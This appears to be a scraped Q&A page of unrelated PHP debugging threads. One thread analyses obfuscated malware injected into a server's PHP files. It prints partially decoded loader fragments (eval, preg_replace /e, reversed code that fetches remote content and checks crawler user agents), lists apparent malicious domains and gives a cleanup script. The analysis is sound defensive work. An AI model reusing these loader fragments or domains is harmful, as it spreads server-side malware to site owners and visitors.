This question already has answers here:
The 3 different equals
(5 answers)
Closed 4 years ago.
I wrote a program in python in my raspberry pi which use the gpio 17. My goal is to read the status of this gpio separably to this program, to run a "if" and to display the result in a local website. For this, I use apache2 and PHP (version 7), I'm beginner in this language. This is the program I use :
<?php
$read = shell-exec ('gpio read 0');
$status = intval($read);
if ($status = 1) {
print ("oui");
}
else {
print ("non");
}
?>
This program don't work because if I understand, the value of $read I obtain is a string and I need an Int to use it in my "If". For it, I tried to change this String to an Int thanks to the function intval() (like you can see in the program in the top) but it didn't work. I tried to use also the ord() and the (int) function. The result is always the same. It display "oui".
Is my problem come from the intval() function or is it maybe come from shell-exec() ?
Thanks for your help ;)
I tried to be the clearest possible in my explanation
You have an error at this line, since = is not a comparison operator:
if ($status = 1) {
It should be:
if ($status == 1) {
If you also want to check that 1 and $status are of the same type, use the operator === instead. Here is the PHP documentation for comparison operator.
You will need to use a comparison operator. I have modified your if condition to compare if the values are identical.
<?php
$read = shell-exec ('gpio read 0');
$status = intval($read);
if ($status === 1) { //Use === to check if they are the same type and value
print ("oui");
}
else {
print ("non");
}
?>
Related
I have this code :
if(strlen($userdata->yim['text']) > 2 && !isset($_POST['step1']) ){
$GLOBALS['error'] = 1;
$GLOBALS['error_type'] = "tip";
$GLOBALS['error_msg'] = $userdata->yim['text'];}
I read about this error on this site but i have no ideea how to apply the fix on my particular code. I`m sorry if i repost the problem.
Try doing: var_dump($userdata->yim); to verify if yim does in fact exist and contains the key 'text'.
Or even just var_dump($userdata);
$userdata->yim['text'] is not set, so you should check for that first:
if(isset($userdata->yim['text']) && strlen($userdata->yim['text']) > 2 && !isset($_POST['step1']) ){
However, if that section of code relies on that value, something is wrong before that and this will just hide that problem.
In order to debug this you will need to utilize print_r() so that you can see the contents of your object or array:
// see what $userdata contains - update your question with the results of the line below
echo '<div style="background-color:white; padding:15px;"><pre>'.print_r($userdata, true).'</pre></div>';
// see what $userdata->yim contains - update your question with the results of the line below as well
echo '<div style="background-color:white; padding:15px;"><pre>'.print_r($userdata->yim, true).'</pre></div>';
if(strlen($userdata->yim['text']) > 2 && !isset($_POST['step1']))
{
$GLOBALS['error'] = 1;
$GLOBALS['error_type'] = "tip";
$GLOBALS['error_msg'] = $userdata->yim['text'];
}
Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code do or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
http://ddecode.com/
Good luck
I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
}
}
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.
I am trying to run a php script that says basically, whilst two cells in my MySQL database are empty (t_trailerarrival and t_endsort), do something.
My code is as follows:
<?php
// Start Session, include authentication and dBConnection script
session_start();
include 'dbcon.php';
include 'sql_actuals.php';
$current_time = date("G");
while($query9_row['a_trailerarrival'] == NULL && $query10_row['a_endsort'] == NULL) {
echo "Trailer Arrival";
}
The $queryx_row['abc'] are all in the sql_actuals script that is included into this script.
For some reason, every time i run this script - my browser wont load the result (just loads for ever) and then my website at windows azure seems to crash and take a few minutes to restart.
Could someone please advise if there is a massively obvious error with my script? or point me at what the possible issue could be.
Many thanks in advance.
FYI, i have tried adding a line sleep(1); so that it gave the server it runs off a delay before having to run the program again but no luck.
You are never closing the while loop.
while($query9_row['a_trailerarrival'] == NULL && $query10_row['a_endsort'] == NULL) {
echo "Trailer Arrival";
}
Without modifying the while conditions during a while statement, once you start, you'll never stop. Therefore hanging the script and server.
You are not actually doing anything in your while statement except echoing a line.
Therefore
$query9_row['a_trailerarrival'] == NULL
and
$query10_row['a_endsort'] == NULL
are always true and never changing, and it will never exit the while loop. You need to put exit criteria in the while loop, such as:
$i=0;
while(($query9_row['a_trailerarrival'] == NULL
&& $query10_row['a_endsort'] == NULL )
|| $i==10) {
$i++;
echo "Trailer Arrival";
}
Although, logically speaking, you still need to run the query data.
** Edit **
Based upon your feedback, this doesn't sound like a while loop at all, but rather an if statement you need (with multiple elseif s).
if ($query9_row['a_trailerarrival'] == NULL && $query10_row['a_endsort'] == NULL){
echo "Trailer Arrival";
} elseif ($query9_row['a_trailerarrival'] == NULL && $query10_row['a_endsort']){
echo "End Sort";
} elseif ($query9_row['a_trailerarrival'] && $query10_row['a_endsort']){
echo "First Van";
}else {
// fourth condition:
// $query9_row['a_trailerarrival'] != NULL && $query10_row['a_endsort'] == NULL
}
I included a fourth condition when $query9_row isn't null, and $query10_row is null.
How would I add an IF statement to check if the opencart version is greater than 1.5.1.3?
This is defined in the index.php as:
// Version
define('VERSION', '1.5.0');
I have tried: if((int)VERSION >= '1.5.1.3'){ although when I convert this into an int it becomes empty.
Also I tried this with the same effect:
$this->data['oc_version'] = (int)str_replace('.', '', VERSION);
if($this->data['oc_version'] >= 1513){
Do I need to convert this into an int to correctly perform greater/less than calculations?
if(version_compare(VERSION, '1.5.1.3', '>')) {
// CODE HERE IF HIGHER
} else {
// CODE HERE IF LOWER
}
Though the 1.5.1.3 branch actually goes up to 1.5.1.3.1 so I'm guessing you want it to be that
I tried this recently and couldnt get it working as above, perhaps its a PHP version thing but I got it working with:
if(version_compare(VERSION, '1.5.1.3') > 0) {
// CODE HERE IF HIGHER
} else {
// CODE HERE IF LOWER
}
Hope that helps someone else. Got the code from here: http://us2.php.net/manual/en/function.version-compare.php
I have recently started practicing with sockets on PHP and got an issue for which I find no documentation. Similar cases I've seen in C++, but not a clear answer to this. The code:
do {
$input = socket_read($client, 12,PHP_BINARY_READ);
echo $input;
} while(TRUE);
Is supposed to block on the socket (code for creation, bind, etc not included) and get either 12 bytes or whatever information is available from the other side.
Oddly I just get a '1' in the variable $input if 12 bytes are read. If I send from the client side more than 12 bytes then I receive '1[REST_OF_DATA]' in the value of $input.
Any idea why this is happening?
If I change this to more data and to PHP_NORMAL_READ then I correctly receive the data.
PHP manual online does not say anything abou socket_read returning '1'..
**EDIT: Ok thanks for yout early answers :). I am saving to a file and reading (not echoing to browser) expecting any character. I think I may have just discovered something that could be good if someone with knowledge of C++ sockets can verify. Anyways, my read code actually was this (not what I posted above):
do {
$input = ($seq_id == 0) ? socket_read($client, 12,PHP_BINARY_READ) : socket_read($client,1024,PHP_BINARY_READ);
echo $input;
} while(TRUE);
I was expecting 12 bytes at the first read, then chunks of 1024, reason for that condition check. The weird '1' comes from this. If I replace that with the line I posted above the data is read normally. In fact, even reading like this:
$input = ($seq_ID == 0) ? socket_read($client,12,PHP_BINARY_READ) : socket_read($client, 12,PHP_BINARY_READ);
Results in : 1st read = '1' 2nd read = correct data, 3rd read = correct data..
The 12 you specify is the maximum length to read, so 12 can mean a return string of a size from 0-12 characters (binary string in PHP, 1 char = 1 byte).
Additionally as that can be binary, I suggest you use var_dump and a hexdump of the return string value to actually find out how many bytes were returned, echo might hide some control characters, your browser might hide whitespace.
For the comments above, yes $seq_id should increment. I just wanted to shorten the code. So now, the answer is not important for me anymore but remains an enigma, after upgrading my Ubuntu version this month I have been unable to replicate the error with the same script:
<?php
set_time_limit(0);
$address = "192.168.1.1";
$port = 3320;
$server_users = 3;
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die("Could not create socket\n");
$bind_result = socket_bind($mysock,$address, $port) or die("Could not bind to address\n");
$listen_result = socket_listen($mysock, $server_users) or die("Could not set up socket listener\n");
$client = socket_accept($mysock) or die("Could not accept the connection to socket\n");
$seq_id =0;
do {
$input = ($seq_id == 0) ? socket_read($client, 12,PHP_BINARY_READ) : socket_read($client,1024,PHP_BINARY_READ);
echo $input;
} while(TRUE);
?>
I execute it in terminal:
$php -q myscript.php
And test it using netcat:
$netcat 192.168.1.1 3320
Note that the question is about socket_read returning 1 as it results, which is not documented anywhere